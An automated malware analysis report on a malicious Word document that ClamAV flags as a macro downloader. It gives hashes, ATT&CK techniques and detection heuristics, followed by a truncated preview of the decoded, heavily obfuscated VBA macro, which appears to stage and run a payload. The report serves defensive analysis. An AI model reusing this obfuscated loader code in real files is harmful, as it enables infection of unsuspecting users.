Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fb82fd4534d7c32a…

MALICIOUS

Office (OLE)

184.5 KB Created: 2018-05-02 20:50:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: bdce6d8e2110cd49c9d923f1e6c7503d SHA-1: 8f78ffbb5b40c456abeaf6acb9c2a5afc99190ef SHA-256: fb82fd4534d7c32a3de8523fde2d59b7c26146eae1827c0b4202630e3004c587
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it's a macro-based downloader. The presence of a Document_Open macro and embedded VBA code strongly suggests the document's primary purpose is to execute malicious code upon opening. The VBA script, though obfuscated, likely attempts to download and execute a secondary payload, aligning with common downloader tactics.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12720 bytes
SHA-256: 5efd1574aa0c79c5df1b8b6c547265d130c512a8a3ab82fa1299c2f8e041c61e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function tagasaste(brambling, monestrous, meatball)
Dim actinomyces As Long
Dim tamely As Variant
Dim fluorite As Long
Dim embers As Variant
Dim elsholtzia As Long
Dim redcoat As Variant
Dim melampsoraceae As Long
Dim tinca As Variant
Dim adorable As Long
Dim delonix As String
Dim arithmancy As Byte
cimarron = cimarron / 167
cimarron = Rnd(369)
actinomyces = brambling
adorable = meatball
nitid = Rnd(477)
elsholtzia = monestrous
phocaena = 44 + 22
Pmt 0, phocaena, 25097, 47104, 2
mete = "neuromotor"
fluorite = 51 - 101 + 49
lady ByVal fluorite, actinomyces, elsholtzia, adorable, melampsoraceae
nitid = Fix(307)
End Function
Sub apt()
Dim swishing As Variant
Dim casablanca As Long
worth.majeure.Value = Day(#12/5/2013#)
varday = lackbrain = actionable
hackee = "centenary"
chancellorship = cato
blended = harebell
doubly = "profoundly"
idealization = "ditheism"
attacker = "atomization"
Set cloak = worth.majeure.SelectedItem
volva = 36 + 10
Pmt 0, volva, 3692, 36111, 4
dipodomys = cloak.Name
churlishly = 117 - 114 + 7841
distributor = Right(dipodomys, churlishly)
ant = hardliner.occasionem(distributor)
maxillaria = 27 + 15
Pmt 0, maxillaria, 28216, 28779, 8
informal = "empyreal"
#If (126 - 7 + 281 + 103 - 121 + 318) > ((70 - 36 + 286) - (26 - 23 + 537) * 1) And ((113 - 71 - 14) - (79 - 32 - 19)) * 2 < (Win64) Then
Dim statistic As Variant
Dim enteric As LongPtr
Dim begonia As LongPtr
Dim mica As Variant
#ElseIf (19 - 26 + 407 + 26 - 22 + 296) > ((86 - 18 + 252) - (27 - 59 + 572) * 1) And Not ((47 - 66 + 47) - (113 - 74 - 11)) * 2 < (Win64) Then
Dim dryden As String
Dim begonia As Long
Dim neurosarcoma As String
Dim enteric As Long
#End If
carboniferous = 95 - 97 + 2
compassionate = "valediction"
accrust = 10 - 51 + 4137
austerely = 24 + 23
 Pmt 0, austerely, 9585, 17386, 2

prisons = agathis
hoi = "messalina"
hardware = dig
schooling = "incombustible"
fettuccine = 3 + 25
 Pmt 0, fettuccine, 32062, 47578, 3

ningal = ant
fertile = "zerronnen"
maniple = bota
enteric = bells(ningal)
katharometer = adaption
paixhan = "sprout"
#If (5 - 2 + 397 + 101 - 22 + 221) > ((4 - 51 + 367) - (11 - 63 + 592) * 1) And ((110 - 27 - 55) - (41 - 54 + 41)) * 2 < (Win64) Then
Dim arrectis As Variant
Dim confute As LongPtr
Dim heist As LongPtr
Dim fur As LongPtr
podiatry = 63 - 124 + 2125
#ElseIf (55 - 19 + 364 + 120 - 6 + 186) > ((84 - 111 + 347) - (126 - 9 + 423) * 1) And Not ((68 - 73 + 33) - (18 - 115 + 125)) * 2 < (Win64) Then
Dim confute As Long
aculeate = 118 - 47 + 710
Dim heist As Long
Dim fur As Long
podiatry = aculeate + 3459

#End If
Dim forelay As Integer
Dim unornamented As String
confute = 94 - 49 - 45
begonia = enteric + podiatry
heist = 16 - 104 + 201615
fur = 72 - 89 + 3517
artificially = fissurellidae(heist, confute, begonia, confute, confute, confute, confute)
aguardiente = 6 + 29
 Pmt 0, aguardiente, 32627, 32363, 7

End Sub

Function spirituality(carambola, piquancy, crystallized)
Dim furioso As Variant
Dim alligatorfish As Integer
Dim divorcement As LongPtr
Dim latchkey As LongPtr
Dim mornful As LongPtr
Dim argentinosaur As Long
Dim jab As LongPtr
Dim fiddleneck As LongPtr
nitid = Rnd(443)
diarist = diarist
latchkey = carambola
fiddleneck = crystallized
diarist = diarist
jab = piquancy
burnout = 32 + 51
 Pmt 0, burnout, 29068, 16169, 8

diarist = mete
divorcement = 45 - 91 + 45
lady ByVal divorcement, _
latchkey, _
jab, fiddleneck, _
mornful
mete = "ordovician"
End Function
Function bells(screeen)
Dim cede As Variant
Dim editorship As Byte
Dim antilles As Byte
Dim manet As Integer
#If (26 - 88 + 462 + 123 - 52 + 229) > ((61 - 51 + 310) - (54 - 37 + 523) * 1) And ((36 - 105 + 97) - (52 - 123 + 99)) * 2 < (Win64) Then
D
... (truncated)